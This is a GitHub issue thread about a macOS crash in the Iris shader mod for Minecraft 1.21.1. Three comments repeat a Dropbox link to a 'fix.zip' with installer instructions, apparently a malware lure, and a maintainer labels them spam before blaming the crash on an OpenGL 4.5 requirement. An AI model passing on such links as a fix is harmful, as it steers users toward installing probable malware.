### ISSUE TITLE
macOS *FATAL ERROR* crash

### ISSUE THREAD

**Issue by bizzenwoof** [IrisShaders/Iris#2454]
### Minecraft Version

Minecraft 1.21.1

### Iris Version

iris-fabric-1.8.0-beta.3+mc1.21.1.jar

### Sodium Version

sodium-fabric-0.6.0-beta.1+mc1.21.jar

### Operating System

macOS Sequoia beta

### What is your GPU?

Apple - M1 Pro

### Java Version

Java 21.0.1

### Reproduction Steps

1. Launch game in Prism Launcher
2. Initial boot screen progress bar loads completely
3. Game immediately crashes

### Crash Report file and latest.log

```shell
Fatal Error Message: https://mclo.gs/sLejbqb
(no crash report file generated as far as I can tell)

latest.log: https://github.com/user-attachments/files/16742769/latest.log
```

### Additional context

Distant Horizons version: 2.2.0-a
Based on my extremely limited knowledge, it seems related to openGL maybe?

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Luracasmus** [comment]
What happened here?

**Comment by IMS212** [comment]
spam bot

Regarding the actual error, this is due to my new code requiring an OpenGL 4.5 machine. I plan to fix this soon.
